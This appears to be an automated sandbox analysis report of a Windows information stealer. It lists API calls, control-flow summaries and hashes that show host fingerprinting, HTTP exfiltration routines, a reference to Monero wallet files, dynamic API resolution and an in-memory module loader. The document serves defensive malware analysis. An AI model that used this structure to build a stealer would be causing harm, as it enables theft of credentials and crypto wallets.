• ec4899, a wininet request routine: ec47b0 (lstrlen, InternetCrackUrlA at ec4848), lstrcpy x5 (eda740), InternetOpenA + StrCmpCA (ec490b), ed8b60 (lstrcpy, GetSystemTime at ed8b82), the string helpers eda920 (lstrcpy, lstrcat), eda9b0 (lstrcpy, lstrlen, lstrcpy, lstrcat) and eda8a0 (lstrcpy) repeated many times, InternetConnectA (ec4aa3), HttpOpenRequestA (ec4ad3), lstrlen (ec4de7, ec4e03), HttpSendRequestA (ec4e13), InternetReadFile in a loop (ec4e32), InternetCloseHandle (ec4e67, ec4ebe, ec4ecb). The response is handed to ec9ac0: CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree.
• ed17c4-ed1970, response dispatch: StrCmpCA at ed17c4 with ExitProcess (ed17cf) on the failing branch, then StrCmpCA at ed185d, ed187f, ed18ad, ed18cf, ed18f1, ed1913, ed1932, ed1951 and ed1970, with eda820 (lstrlen, lstrcpy) inside the loop.
• ec5979, a second wininet request routine with the same structure: ec47b0, lstrcpy x5, InternetOpenA + StrCmpCA (ec59ee), ed8b60, InternetConnectA (ec5b7c), HttpOpenRequestA (ec5bac); the body is measured with lstrlen (ec5e70, ec5eae, ec5ed7, ec5ef0, ec5f1a) and allocated with GetProcessHeap / RtlAllocateHeap (ec5e81); HttpSendRequestA (ec5f2a), InternetReadFile in a loop (ec5f35), InternetCloseHandle (ec5f6a, ec5fb6, ec5fc3); the response again goes through ec9ac0.
• ed0db7, ed0f67, ed1077: StrCmpCA checks (ed0e27, ed0e67, ed0ea4; ed0fb2) over strings built with eda820 (lstrlen, lstrcpy).
• ed1a26-ed2699, host information collection; each item is appended to a buffer with eda9b0 / eda8a0 / eda920 and the collectors are:
    • ed7500 (above, 6 API calls: volume information)
    • ed7690 -> ed77a0 -> ed7720: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA (ed7765), RegCloseKey (ed7780); a second RegOpenKeyExA / RegQueryValueExA / RegCloseKey at ed76c6-ed7704
    • ed77c0: GetCurrentProcess, IsWow64Process
    • ed7850 and ed78e0: 3 API calls each (not expanded in the list)
    • ed7980: GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA
    • ed7a30: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA (ed7a9a)
    • ed7b00: GetUserDefaultLocaleName; ed8d20: LocalAlloc, CharToOemW
    • ed7b90: GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList (ed7bcc), GetLocaleInfoA in a loop (ed7c46), LocalFree (ed7d1e)
    • ed7d80: GetSystemPowerStatus
    • ed207e: GetCurrentProcessId; ed9470: OpenProcess, GetModuleFileNameExA, CloseHandle (ed9493)
    • ed7e00: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA (ed7e68), RegCloseKey (ed7e8e)
    • ed7f60: GetLogicalProcessorInformationEx (ed7fb9), GetLastError (ed7fd8), heap allocation and release through ed8a10 (GetProcessHeap, RtlAllocateHeap) and ed89f0 (GetProcessHeap, HeapFree), wsprintfA (ed8084)
    • ed7ed0: GetSystemInfo, wsprintfA
    • ed8100: GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx (ed814d), __aulldiv, wsprintfA (ed819b)
    • ed87c0: GetProcessHeap, RtlAllocateHeap, wsprintfA (ed87fb)
    • ed81f0: string concatenation only (eda9b0 / eda8a0)
    • ed8320, called twice (ed24b7 and ed254c, 17 API calls): RegOpenKeyExA (ed835c), RegEnumKeyExA in a loop (ed83f8), wsprintfA + RegOpenKeyExA (ed843f), RegQueryValueExA (ed84c1 and ed856e), lstrlen (ed84fa), RegCloseKey (ed8485, ed8601, ed8613)
    • ed8680: CreateToolhelp32Snapshot, Process32First (ed86bc), Process32Next in a loop (ed86e8), CloseHandle (ed875d)
    • then lstrlen (ed265a), ec1590 (lstrcpy) and ed5190, which calls ec5100.
• ec5100, a third wininet request routine: ec47b0, ed8ea0 (CryptBinaryToStringA at ed8ead, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA at ed8f05), lstrlen (ec5192), lstrcpy x5, InternetOpenA + StrCmpCA (ec51fd), ed8b60, InternetConnectA (ec5329), HttpOpenRequestA (ec5359), InternetCloseHandle (ec58b7, ec58c4); the list stops at ec546e, so the send and read part of this routine is not in it.
• ec5009: InternetOpenUrlA, InternetReadFile in a loop (ec502a), InternetCloseHandle x2 (ec50a0).
• ed0759-ed0a49: StrCmpCA dispatch (ed0799, ed0865, ed099c) with the ec1590 / eda7a0 lstrcpy helpers, calling ecfb00, ed0250 (which calls ed8de0, 2 API calls) and ec98d0.
• ec98d0 -> ec9880 -> ec6fb0 -> ec6d40, the pattern of a manual in-memory module loader: ec6530 (ed8a10 heap allocation, VirtualAlloc at ec668f and ec6743), ec69b0 (LoadLibraryA at ec6a09, a GetProcAddress loop at ec6ba8, ed8a10 / ed89f0 heap allocation and release), VirtualFree (ec6ee6), FreeLibrary (ec6f26).
• Small helpers referenced throughout: ec15a3 / ec1590 (lstrcpy), eda740 and eda7a0 (lstrcpy), eda820 (lstrlen, lstrcpy), eda8a0 (lstrcpy), eda920 (lstrcpy, lstrcat), eda9b0 (lstrcpy, lstrlen, lstrcpy, lstrcat), eda8a0, edaad0 (no API).

                                Control-flow Graph (function ed9860; the executed / not-executed colouring is only visible in the interactive graph)
                                • ed9860-ed9874: call ed9750; branches either to the next block or straight to ed9a93
                                • ed987a-ed9a8e: call ed9780, then GetProcAddress x21 in a straight line
                                • ed9a93-ed9af2: LoadLibraryA x5
                                • ed9af4-ed9b08: GetProcAddress (this block can be skipped)
                                • ed9b0d-ed9b14: check; ed9b16-ed9b41: GetProcAddress x2 (can be skipped)
                                • ed9b46-ed9b4d: check; ed9b4f-ed9b63: GetProcAddress (can be skipped)
                                • ed9b68-ed9b6f: check; ed9b71-ed9b84: GetProcAddress (can be skipped)
                                • ed9b89-ed9b90: check; ed9b92-ed9bbc: GetProcAddress x2 (can be skipped)
                                • ed9bc1-ed9bc2: exit block
                                APIs
                                • GetProcAddress.KERNEL32(75900000,01B80750), ref: 00ED98A1
                                • GetProcAddress.KERNEL32(75900000,01B807B0), ref: 00ED98BA
                                • GetProcAddress.KERNEL32(75900000,01B806F0), ref: 00ED98D2
                                • GetProcAddress.KERNEL32(75900000,01B80780), ref: 00ED98EA
                                • GetProcAddress.KERNEL32(75900000,01B80570), ref: 00ED9903
                                • GetProcAddress.KERNEL32(75900000,01B88B00), ref: 00ED991B
                                • GetProcAddress.KERNEL32(75900000,01B76440), ref: 00ED9933
                                • GetProcAddress.KERNEL32(75900000,01B76300), ref: 00ED994C
                                • GetProcAddress.KERNEL32(75900000,01B80768), ref: 00ED9964
                                • GetProcAddress.KERNEL32(75900000,01B80708), ref: 00ED997C
                                • GetProcAddress.KERNEL32(75900000,01B80798), ref: 00ED9995
                                • GetProcAddress.KERNEL32(75900000,01B805B8), ref: 00ED99AD
                                • GetProcAddress.KERNEL32(75900000,01B76320), ref: 00ED99C5
                                • GetProcAddress.KERNEL32(75900000,01B807C8), ref: 00ED99DE
                                • GetProcAddress.KERNEL32(75900000,01B807E0), ref: 00ED99F6
                                • GetProcAddress.KERNEL32(75900000,01B764A0), ref: 00ED9A0E
                                • GetProcAddress.KERNEL32(75900000,01B80810), ref: 00ED9A27
                                • GetProcAddress.KERNEL32(75900000,01B80858), ref: 00ED9A3F
                                • GetProcAddress.KERNEL32(75900000,01B764C0), ref: 00ED9A57
                                • GetProcAddress.KERNEL32(75900000,01B808B8), ref: 00ED9A70
                                • GetProcAddress.KERNEL32(75900000,01B765A0), ref: 00ED9A88
                                • LoadLibraryA.KERNEL32(01B80888,?,00ED6A00), ref: 00ED9A9A
                                • LoadLibraryA.KERNEL32(01B80870,?,00ED6A00), ref: 00ED9AAB
                                • LoadLibraryA.KERNEL32(01B80918,?,00ED6A00), ref: 00ED9ABD
                                • LoadLibraryA.KERNEL32(01B80900,?,00ED6A00), ref: 00ED9ACF
                                • LoadLibraryA.KERNEL32(01B808A0,?,00ED6A00), ref: 00ED9AE0
                                • GetProcAddress.KERNEL32(75070000,01B808D0), ref: 00ED9B02
                                • GetProcAddress.KERNEL32(75FD0000,01B808E8), ref: 00ED9B23
                                • GetProcAddress.KERNEL32(75FD0000,01B88EF8), ref: 00ED9B3B
                                • GetProcAddress.KERNEL32(75A50000,01B88F28), ref: 00ED9B5D
                                • GetProcAddress.KERNEL32(74E50000,01B76520), ref: 00ED9B7E
                                • GetProcAddress.KERNEL32(76E80000,01B88A90), ref: 00ED9B9F
                                • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00ED9BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00ED9BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction ID: 368aaca265a629e11adce1e31b7d42841a0857fdb81c88242388e58c555208db
                                • Opcode Fuzzy Hash: e9aea032318d51e8a9bb9ce7a65c72c00bdcbf122234073f5274044162eaf47a
                                • Instruction Fuzzy Hash: CAA11BB5D107409FD36EEFA8F99895637F9FF8C302704853AA6268324CD6BA95C1CB50

                                 Control-flow Graph (image not extracted): function ec45c0-ec47a9; the API-calling blocks are ec45c0-ec4695 (RtlAllocateHeap) and ec474f-ec47a9 (VirtualProtect), with a loop over ec46a0-ec474a; legend: Executed / Not Executed.
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EC479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EC4765
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                 • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: cb3507a3fa0f733fa5a42f9e82560bdf6b70c6ecf9f5c4e1f4a8682e3db1d7d4
                                • Instruction ID: fc58132988c41ad114389dbdf67f02ed96ce885820b1c227ad43c3951c9ac1e6
                                • Opcode Fuzzy Hash: cb3507a3fa0f733fa5a42f9e82560bdf6b70c6ecf9f5c4e1f4a8682e3db1d7d4
                                • Instruction Fuzzy Hash: 994137A17C278C6BC634F7B59D4EF9D73925F4A746F907148EA6072280CBF05D005DA5

                                 Control-flow Graph (image not extracted): function ec4880-ec4fa2; the API-calling blocks are ec4880-ec4942 (InternetOpenA, StrCmpCA), ec4955-ec4acd (InternetConnectA), ec4aef-ec4b22 (HttpOpenRequestA), ec4b28-ec4e28 (lstrlen, HttpSendRequestA), ec4e32-ec4e5c (InternetReadFile, in a read loop with ec4e69-ec4ea7), and ec4e67-ec4eb9, ec4ebe-ec4ec5 and ec4ecb-ec4ef3 (InternetCloseHandle); legend: Executed / Not Executed.
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC4915
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC4ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EE0DDB,00000000,?,?,00000000,?,",00000000,?,01B8E320), ref: 00EC4DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC4E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC4E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00EC4E49
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4EC5
                                • HttpOpenRequestA.WININET(00000000,01B8E250,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC4B15
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC4ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction ID: 55fe9427c86c2c6351008521cb85ec8ce604c782ea5fb1cd910065eaa635e14b
                                • Opcode Fuzzy Hash: d3548b6d7d4c05248285ac7acfc326e1dea540c59534cf51d303a7471c584897
                                • Instruction Fuzzy Hash: BC127F769102189ACB19EB50DCA6FEEB3B8EF54300F5451AAB50673191EF702F4ACF61
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction ID: 90ce5dbb4e347e22fbbce409cccb523a4b0dacd0bd84d3ae19e3fa7c594dc057
                                • Opcode Fuzzy Hash: cec86f536b6407665ff9fe16f4f18dd1349745eca0c461ed53bd6a7bbb2285b5
                                • Instruction Fuzzy Hash: 080162B1948308EBC714DF95D945BAEBBB8FB44B15F10422BE595B3380D3B459418BA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                APIs
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0

                                Control-flow Graph (graph image with executed/not-executed legend; function at ed9c10: eight LoadLibraryA calls followed by chains of GetProcAddress calls per loaded module)
                                APIs
                                • GetProcAddress.KERNEL32(75900000,01B764E0), ref: 00ED9C2D
                                • GetProcAddress.KERNEL32(75900000,01B762C0), ref: 00ED9C45
                                • GetProcAddress.KERNEL32(75900000,01B88C40), ref: 00ED9C5E
                                • GetProcAddress.KERNEL32(75900000,01B88E20), ref: 00ED9C76
                                • GetProcAddress.KERNEL32(75900000,01B8CAC0), ref: 00ED9C8E
                                • GetProcAddress.KERNEL32(75900000,01B8CA78), ref: 00ED9CA7
                                • GetProcAddress.KERNEL32(75900000,01B7B608), ref: 00ED9CBF
                                • GetProcAddress.KERNEL32(75900000,01B8C8F8), ref: 00ED9CD7
                                • GetProcAddress.KERNEL32(75900000,01B8C880), ref: 00ED9CF0
                                • GetProcAddress.KERNEL32(75900000,01B8C820), ref: 00ED9D08
                                • GetProcAddress.KERNEL32(75900000,01B8C850), ref: 00ED9D20
                                • GetProcAddress.KERNEL32(75900000,01B76340), ref: 00ED9D39
                                • GetProcAddress.KERNEL32(75900000,01B76560), ref: 00ED9D51
                                • GetProcAddress.KERNEL32(75900000,01B76400), ref: 00ED9D69
                                • GetProcAddress.KERNEL32(75900000,01B76360), ref: 00ED9D82
                                • GetProcAddress.KERNEL32(75900000,01B8C910), ref: 00ED9D9A
                                • GetProcAddress.KERNEL32(75900000,01B8CA30), ref: 00ED9DB2
                                • GetProcAddress.KERNEL32(75900000,01B7B3D8), ref: 00ED9DCB
                                • GetProcAddress.KERNEL32(75900000,01B76460), ref: 00ED9DE3
                                • GetProcAddress.KERNEL32(75900000,01B8C928), ref: 00ED9DFB
                                • GetProcAddress.KERNEL32(75900000,01B8CAD8), ref: 00ED9E14
                                • GetProcAddress.KERNEL32(75900000,01B8CAA8), ref: 00ED9E2C
                                • GetProcAddress.KERNEL32(75900000,01B8C9A0), ref: 00ED9E44
                                • GetProcAddress.KERNEL32(75900000,01B76580), ref: 00ED9E5D
                                • GetProcAddress.KERNEL32(75900000,01B8C9B8), ref: 00ED9E75
                                • GetProcAddress.KERNEL32(75900000,01B8CA90), ref: 00ED9E8D
                                • GetProcAddress.KERNEL32(75900000,01B8C9D0), ref: 00ED9EA6
                                • GetProcAddress.KERNEL32(75900000,01B8C9E8), ref: 00ED9EBE
                                • GetProcAddress.KERNEL32(75900000,01B8C868), ref: 00ED9ED6
                                • GetProcAddress.KERNEL32(75900000,01B8CA00), ref: 00ED9EEF
                                • GetProcAddress.KERNEL32(75900000,01B8C808), ref: 00ED9F07
                                • GetProcAddress.KERNEL32(75900000,01B8CA18), ref: 00ED9F1F
                                • GetProcAddress.KERNEL32(75900000,01B8C898), ref: 00ED9F38
                                • GetProcAddress.KERNEL32(75900000,01B89D38), ref: 00ED9F50
                                • GetProcAddress.KERNEL32(75900000,01B8C940), ref: 00ED9F68
                                • GetProcAddress.KERNEL32(75900000,01B8CA48), ref: 00ED9F81
                                • GetProcAddress.KERNEL32(75900000,01B76280), ref: 00ED9F99
                                • GetProcAddress.KERNEL32(75900000,01B8C8B0), ref: 00ED9FB1
                                • GetProcAddress.KERNEL32(75900000,01B762A0), ref: 00ED9FCA
                                • GetProcAddress.KERNEL32(75900000,01B8CA60), ref: 00ED9FE2
                                • GetProcAddress.KERNEL32(75900000,01B8C7F0), ref: 00ED9FFA
                                • GetProcAddress.KERNEL32(75900000,01B763C0), ref: 00EDA013
                                • GetProcAddress.KERNEL32(75900000,01B763E0), ref: 00EDA02B
                                • LoadLibraryA.KERNEL32(01B8C838,?,00ED5CA3,00EE0AEB,?,?,?,?,?,?,?,?,?,?,00EE0AEA,00EE0AE3), ref: 00EDA03D
